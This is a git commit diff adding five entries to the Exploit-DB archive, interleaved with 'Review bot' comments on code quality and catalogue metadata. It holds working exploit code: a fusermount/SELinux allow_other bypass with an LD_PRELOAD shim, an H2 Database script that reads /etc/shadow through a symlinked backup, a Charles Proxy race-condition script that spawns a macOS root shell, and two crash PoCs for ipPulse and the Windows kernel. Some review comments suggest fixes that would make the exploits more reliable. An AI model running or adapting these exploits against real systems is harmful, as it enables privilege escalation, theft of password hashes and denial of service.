DB: 2018-07-31

5 changes to exploits/shellcodes

fusermount - user_allow_other Restriction Bypass and SELinux Label Control
ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)
Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)

Charles Proxy 4.2 - Local Privilege Escalation

H2 Database 1.4.197 - Information Disclosure
Offensive Security 2018-07-31 05:01:47 +00:00
parent 582d8f748e
commit b02440845e
6 changed files with 357 additions and 0 deletions

100
exploits/linux/dos/45106.c Normal file

@ -0,0 +1,100 @@
/*
It is possible to bypass fusermount's restrictions on the use of the
"allow_other" mount option as follows if SELinux is active.
Here's a minimal demo, tested on a Debian system with SELinux enabled in
permissive mode:
===============================================
uuser@debian:~$ mount|grep /mount
user@debian:~$ grep user_allow_other /etc/fuse.conf
#user_allow_other
user@debian:~$ _FUSE_COMMFD=10000 fusermount -o allow_other mount/
fusermount: option allow_other only allowed if 'user_allow_other' is set in /etc/fuse.conf
user@debian:~$ _FUSE_COMMFD=10000 fusermount -o 'context=system_u:object_r:fusefs_t:s0-s0:c0-\,allow_other' mount
sending file descriptor: Bad file descriptor
user@debian:~$ mount|grep /mount
/dev/fuse on /home/user/mount type fuse (rw,nosuid,nodev,relatime,context=system_u:object_r:fusefs_t:s0-s0:c0,user_id=1000,group_id=1000,allow_other)
===============================================
Here's a demo that actually mounts a real FUSE filesystem with allow_other,
again on a Debian system configured to use SELinux:
===============================================
user@debian:~$ cat fuse-shim.c
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <dlfcn.h>
#include <stdlib.h>
int execv(const char *path, char *const argv_[]) {
char **argv = (void*)argv_; /* cast away const */
for (char **argvp = argv; *argvp != NULL; argvp++) {
char *arg = *argvp;
for (char *p = arg; *p; p++) {
if (*p == '#') *p = '\\';
}
}
int (*execv_real)(const char *, char *const argv[]) = dlsym(RTLD_NEXT, "execv");
execv_real(path, argv_);
}
/*
user@debian:~$ gcc -shared -o fuse-shim.so fuse-shim.c -ldl
user@debian:~$ echo hello world > hello.txt
user@debian:~$ zip hello.zip hello.txt
adding: hello.txt (stored 0%)
user@debian:~$ LD_PRELOAD=./fuse-shim.so fuse-zip -o 'context=system_u:object_r:fusefs_t:s0-s0:c0-#,allow_other' hello.zip mount
user@debian:~$ mount|grep /mount
fuse-zip on /home/user/mount type fuse.fuse-zip (rw,nosuid,nodev,relatime,context=system_u:object_r:fusefs_t:s0-s0:c0,user_id=1000,group_id=1000,allow_other)
user@debian:~$ sudo bash
root@debian:/home/user# ls -laZ mount
total 5
drwxrwxr-x. 3 root root system_u:object_r:fusefs_t:s0-s0:c0 0 Jul 18 02:19 .
drwxr-xr-x. 30 user user system_u:object_r:unlabeled_t:s0 4096 Jul 18 02:19 ..
-rw-r--r--. 1 user user system_u:object_r:fusefs_t:s0-s0:c0 12 Jul 18 02:19 hello.txt
root@debian:/home/user# cat mount/hello.txt
hello world
===============================================
I have tested that this also works on Fedora (which, unlike Debian, has SELinux
enabled by default.)
Unfortunately, I only noticed that this was possible after I publicly sent some
fusermount hardening patches (https://github.com/libfuse/libfuse/pull/268),
when the maintainer asked a question about one of the patches.
Breaking down the attack, the problems are:
1. fusermount's do_mount() is written as if backslashes escape commas in mount
options; however, this is only true for the "fsname" and "subtype"
pseudo-options filtered out by do_mount(). Neither SELinux nor the FUSE
filesystem follow those semantics. This means that an attacker can smuggle
a forbidden option through fusermount's checks if the previous option ends
with a backslash. However, no option accepted by the FUSE filesystem can end
with a backslash, so this seemed unexploitable at first.
This is fixed by the following commit in my pull request:
https://github.com/libfuse/libfuse/pull/268/commits/455e73588357
2. fusermount uses a blacklist, not a whitelist; this blacklist does not contain
the mount options understood by the SELinux and Smack LSMs. LSMs have the
opportunity to grab mount options and make them invisible to the actual
filesystem through the security_sb_copy_data() security hook.
For this attack, I'm using the "context" option.
This is fixed by the following commit in my pull request:
https://github.com/libfuse/libfuse/pull/268/commits/d23efabfcee4
3. The SELinux LSM is slightly lax about parsing the level component of SELinux
context strings when the policy uses Multi-Level Security (MLS).
When using MLS, the format of a context string is
"<user>:<role>:<type>:<level>"; the level component is parsed by
mls_context_to_sid(). The level component is supposed to specify a
sensitivity range (one or two parts delimited with '-'); each part of the
range may be followed by ':' and a category set specification.
If the sensitivity range consists of two parts and the second part of the
range is followed by a category set, the function incorrectly marks a
trailing '-' and any following data until ':' or '\0' as consumed, but does
not actually parse this data. This allows an attacker to smuggle a backslash
through.
*/
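Review bot: the `execv` interposer in fuse-shim.c falls off the end of a non-void function: `execv_real(path, argv_);` is its last statement and there is no `return`. `execv` only returns on failure, so on that path the caller receives an indeterminate value; write `return execv_real(path, argv_);` and check that `dlsym(RTLD_NEXT, "execv")` did not return NULL before calling through it. Minor: the first prompt of the demo transcript reads `uuser@debian`, and the write-up is clearest where it points at the two fix commits in libfuse PR 268 (455e73588357 for the backslash handling in do_mount(), d23efabfcee4 for the missing `context`/LSM options in the blacklist), since those are the actionable remediation for anyone triaging this entry.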

68
exploits/linux/webapps/45105.py Executable file

@ -0,0 +1,68 @@
# Exploit Title: H2 Database 1.4.197 - Information Disclosure
# Date: 2018-07-16
# Exploit Author: owodelta
# Vendor Homepage: www.h2database.com
# Software Link: http://www.h2database.com/html/download.html
# Version: all versions
# Tested on: Linux
# CVE : CVE-2018-14335
# Description: Insecure handling of permissions in the backup function allows
# attackers to read sensitive files (outside of their permissions) via a
# symlink to a fake database file.
# PS, thanks to HTB and our team FallenAngels
#!/usr/bin/python
import requests
import argparse
import os
import random
def cleanup(wdir):
cmd = "rm {}symlink.trace.db".format(wdir)
os.system(cmd)
def create_symlink(file, wdir):
cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir)
os.system(cmd)
def trigger_symlink(host, wdir):
outputName = str(random.randint(1000,10000))+".zip"
#get cookie
url = 'http://{}'.format(host)
r = requests.get(url)
path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do')
url = '{}/{}'.format(url,path)
payload = {
"tool":"Backup",
"args":"-file,"+wdir+outputName+",-dir,"+wdir}
#print url
requests.post(url,data=payload).text
print "File is zipped in: "+wdir+outputName
if __name__ == "__main__":
parser = argparse.ArgumentParser()
required = parser.add_argument_group('required arguments')
required.add_argument("-H",
"--host",
metavar='127.0.0.1:8082',
help="Target host",
required=True)
required.add_argument("-D",
"--dir",
metavar="/tmp/",
default="/tmp/",
help="Writable directory")
required.add_argument("-F",
"--file",
metavar="/etc/shadow",
default="/etc/shadow",
help="Desired file to read",)
args = parser.parse_args()
create_symlink(args.file,args.dir)
trigger_symlink(args.host,args.dir)
cleanup(args.dir)
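Review bot: the shebang `#!/usr/bin/python` sits after the comment header in 45105.py, so it has no effect even though the file is committed as executable; move it to the first line. The symlink is created and removed through `os.system("ln -s {0} {1}symlink.trace.db")` and `os.system("rm {}symlink.trace.db")` with unquoted, user-supplied paths, which breaks on paths containing spaces or shell metacharacters and silently assumes `--dir` ends in a slash; `os.symlink(args.file, os.path.join(args.dir, "symlink.trace.db"))` and `os.remove(...)` do the same job without a shell. Also `print "File is zipped in: "+wdir+outputName` is Python 2 only, the response from `requests.post(url,data=payload)` is discarded with no status check, and `r.text.split('href = ')[1]` raises an IndexError rather than a clear message when the console page does not match. The header says `# Version: all versions` while the title names 1.4.197; pick one.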


@ -0,0 +1,80 @@
Charles Proxy is a great mac application for debugging web services and
inspecting SSL traffic for any application on your machine.
In order to inspect the SSL traffic it needs to configure the system to use a
proxy so that it can capture the packets and use its custom root CA to decode
the SSL.
Setting a system-wide proxy requires root permissions so this is handled by an
suid binary located within the Charles application folder:
/Applications/Charles.app/Contents/Resources/Charles Proxy Settings
Unfortunately this binary is vulnerable to a race condition which allows a local
user to spawn a root shell. It supports a parameter "--self-repair" which it
uses to re-set the root+suid permissions on itself, with a graphical dialog
shown to the user. However if this is called when the binary is already
root+suid then no password dialog is shown.
It doesn't validate the path to itself and uses a simple API call to get the
path to the binary at the time it was invoked. This means that between executing
the binary and reaching the code path where root+suid is set there is enough
time to replace the path to the binary with an alternate payload which will then
receive the suid+root permissions instead of the Charles binary.
This issue was fixed in Charles 4.2.1 released in November 2017.
https://m4.rkw.io/charles_4.2.sh.txt
2f4a2dca6563d05a201108ec6e9454e2894b603b68b3b70b8f8b043b43ee9284
-------------------------------------------------------------------------------
#!/bin/bash
####################################################
###### Charles 4.2 local root privesc exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
####################################################
cd
user="`whoami`"
cat > charles_exploit.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash","bash","-c","rm -f \"/Users/$user/Charles Proxy Settings\"; /bin/bash",NULL);
return 0;
}
EOF
gcc -o charles_exploit charles_exploit.c
if [ $? -ne 0 ] ; then
echo "failed to compile the exploit, you need xcode cli tools for this."
exit 1
fi
rm -f charles_exploit.c
ln -s /Applications/Charles.app/Contents/Resources/Charles\ Proxy\ Settings
./Charles\ Proxy\ Settings --self-repair 2>/dev/null &
rm -f ./Charles\ Proxy\ Settings
mv charles_exploit Charles\ Proxy\ Settings
i=0
while :
do
r=`ls -la Charles\ Proxy\ Settings |grep root`
if [ "$r" != "" ] ; then
break
fi
sleep 0.1
i=$((i+1))
if [ $i -eq 10 ] ; then
rm -f Charles\ Proxy\ Settings
echo "Not vulnerable"
exit 1
fi
done
./Charles\ Proxy\ Settings
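Review bot: the race in the script is sequenced so that it can be lost in both directions: `./Charles\ Proxy\ Settings --self-repair 2>/dev/null &` is backgrounded and the very next line is `rm -f ./Charles\ Proxy\ Settings`, so if the shell unlinks the symlink before the child has exec'd, the launch fails and the loop reports "Not vulnerable" after one second, a false negative on a vulnerable build. The poll `ls -la Charles\ Proxy\ Settings |grep root` matches `root` in either the owner or the group column; comparing `stat -f %u` against 0 would be unambiguous. In charles_exploit.c the return values of `setuid(0)`/`seteuid(0)` are unchecked, and the heredoc is unquoted so `$user` expands when the script runs, which is intended but deserves a comment. Style: this advisory lacks the `# Exploit Title / Author / Date / CVE` header the other files in this commit carry; the author and the fix version (4.2.1, November 2017) appear only in the prose.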

26
exploits/windows/dos/45102.py Executable file

@ -0,0 +1,26 @@
# Exploit Title: ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-07-27
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
# Software Link : http://download.netscantools.com/ipls192.zip
# Tested Version: 1.92
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python ipPulse_1.92.py
# 2.- Open ipPulse_1.92.txt and copy content to clipboard
# 3.- Open ippulse.exe
# 4.- Target Editor
# 5.- Paste ClipBoard on "IP Address/HostName"
# 6.- Paste ClipBoard on "Comment"
# 7.- Add Above Fields to Target List >>
# 8.- OK
# 9.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 3400
f = open ("ipPulse_1.92.txt", "w")
f.write(buffer)
f.close()
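Review bot: `#!/usr/bin/env python` is inert in 45102.py because it follows the comment header; move it to the first line or drop it. The script body is version-neutral (no `print`), but the header gives no crash details (no exception code, faulting address or register dump of the kind 45104.c includes), so the 3400-byte length cannot be checked against anything; a line on how that length was chosen, and what the crash looks like, would make the entry reproducible. Also `# 9.- Crashed` reads as a result rather than a step.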


@ -0,0 +1,78 @@
# Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
# Author: vportal
# Date: 2018-07-27
# Vendor homepage: http://www.microsoft.com
# Version: Windows 7 x86
# Tested on: Windows 7 x86
# CVE: N/A
# It is possible to trigger a BSOD caused by a Null pointer deference when calling the system
# call NtUserConsoleControl with the following arguments:
# NtUserControlConsole(1,0,8).
# NtUserControlConsole(4,0,8).
# NtUserControlConsole(6,0,12).
# NtUserControlConsole(2,0,12).
# NtUserControlConsole(3,0,20).
# NtUserControlConsole(5,0,8).
# Different crashes are reproduced for each case. For the second case the crash is showed below:
# EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace referencia a la memoria
# en 0x%08lx. La memoria no se pudo %s.
# FAULTING_IP:
# win32k!xxxSetConsoleCaretInfo+c
# 93310641 8b0e mov ecx,dword ptr [esi]
# TRAP_FRAME: 8c747b2c -- (.trap 0xffffffff8c747b2c)
# ErrCode = 00000000
# eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003
# eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nc
# cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010292
# win32k!xxxSetConsoleCaretInfo+0xc:
# 93310641 8b0e mov ecx,dword ptr [esi] ds:0023:00000000=????????
# Resetting default scope
# CUSTOMER_CRASH_COUNT: 1
# DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
# BUGCHECK_STR: 0x8E
# PROCESS_NAME: Win32k-fuzzer_
# CURRENT_IRQL: 0
# LAST_CONTROL_TRANSFER: from 9330fc27 to 93310641
# STACK_TEXT:
# 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc
# 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147
# 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5
# 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall
# WARNING: Frame IP not in any known module. Following frames may be wrong.
# 0016f204 00000000 00000000 00000000 00000000 0x12e6766
# PoC code:
#include <Windows.h>
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...)
{
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
int _tmain(int argc, _TCHAR* argv[])
{
int st = 0;
int syscall_ID = 0x1160; //NtUserControlConsole ID Windows 7
LoadLibrary(L"user32.dll");
st = (int)SystemCall32(syscall_ID, 4, 0, 8);
return 0;
}
# The vulnerability has only been tested in Windows 7 x86.
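Review bot: 45104.c will not compile as committed: the header block uses `#` comments, which in a C/C++ translation unit are invalid preprocessor directives (`# Exploit Title: ...`), so the whole header must be wrapped in `/* ... */` or prefixed with `//`. Beyond that, the PoC needs `<tchar.h>` for `_tmain`/`_TCHAR`, must be built as C++ (`extern "C"`) with the MSVC x86 toolchain for the `__asm` blocks, `SystemCall32` is declared `ULONG` but has no `return` statement (its value is whatever eax holds after `int 0x2e`), and `st` is assigned but never read. The comments also alternate between `NtUserConsoleControl` (title and stack trace) and `NtUserControlConsole` (argument list and the `syscall_ID` comment); the trace shows the former. The `0x1160` syscall number is stated to be Windows 7 x86 only, which matches the `Tested on` line.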


@ -6011,6 +6011,7 @@ id,file,description,date,author,type,platform,port
44958,exploits/windows/dos/44958.py,"Core FTP LE 2.2 - Buffer Overflow (PoC)",2018-07-02,"Berk Cem Göksel",dos,windows,21
44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux,
44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
45106,exploits/linux/dos/45106.c,"fusermount - user_allow_other Restriction Bypass and SELinux Label Control",2018-07-30,"Google Security Research",dos,linux,
44972,exploits/linux/dos/44972.py,"openslp 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux,
44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux,
45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows,
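Review bot: the `type` column for 45106 is `dos`, but the entry's own description ("user_allow_other Restriction Bypass and SELinux Label Control") and the file's content describe a local restriction bypass that lets an unprivileged user mount with `allow_other` and choose the SELinux label, not a denial of service; `local` (the type used for 45107 in this same commit) fits better, and the path would then be `exploits/linux/local/` rather than `exploits/linux/dos/`.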
@ -6030,6 +6031,8 @@ id,file,description,date,author,type,platform,port
45092,exploits/windows/dos/45092.py,"QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows,
45095,exploits/windows/dos/45095.py,"NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows,
45098,exploits/multiple/dos/45098.txt,"Skia - Heap Overflow in SkScan::FillPath due to Precision Error",2018-07-27,"Google Security Research",dos,multiple,
45102,exploits/windows/dos/45102.py,"ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)",2018-07-30,"Luis Martínez",dos,windows,
45104,exploits/windows/dos/45104.c,"Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)",2018-07-30,vportal,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
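Review bot: the author for 45102 is recorded as "Luis Martínez" here while the header of 45102.py says `Luis Martinez`; keep the two consistent so author searches match. The date column (2018-07-30) also differs from the `Discovery Date` / `Date` headers (2018-07-27) in both 45102.py and 45104.c, which is fine if the column is the publication date, but nothing in the file states that convention.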
@ -9835,6 +9838,7 @@ id,file,description,date,author,type,platform,port
45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
45089,exploits/linux/local/45089.py,"Intenos IOPSYS - (Authenticated) Local Privilege Escalation",2018-07-21,neonsea,local,linux,
45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
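Review bot: the description for 45107 gives only "Charles Proxy 4.2", although the advisory text states the issue was fixed in 4.2.1; a range such as "Charles Proxy < 4.2.1" (the form already used by the "Tor Browser < 0.3.2.10" entry in this file) would tell readers which builds are affected. The author column says "Mark Wadham" while the script banner is signed `m4rkw`; carrying the handle in the header would help readers cross-reference the two.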
@ -39714,3 +39718,4 @@ id,file,description,date,author,type,platform,port
45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,80
45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux,
45097,exploits/php/webapps/45097.txt,"SoftNAS Cloud < 4.0.3 - OS Command Injection",2018-07-27,"Core Security",webapps,php,
45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux,
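Review bot: the `port` column for 45105 is empty although the PoC's `--host` metavar is `127.0.0.1:8082`; entries for network-reachable targets elsewhere in this file carry the port (80, 21 in the surrounding hunks), so 8082 would be consistent. The `platform` is set to `linux`, but nothing in 45105.py is Linux-specific beyond the `/etc/shadow` default and the `ln -s` call; `multiple` may be more accurate for a Java application, with the file moved accordingly.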
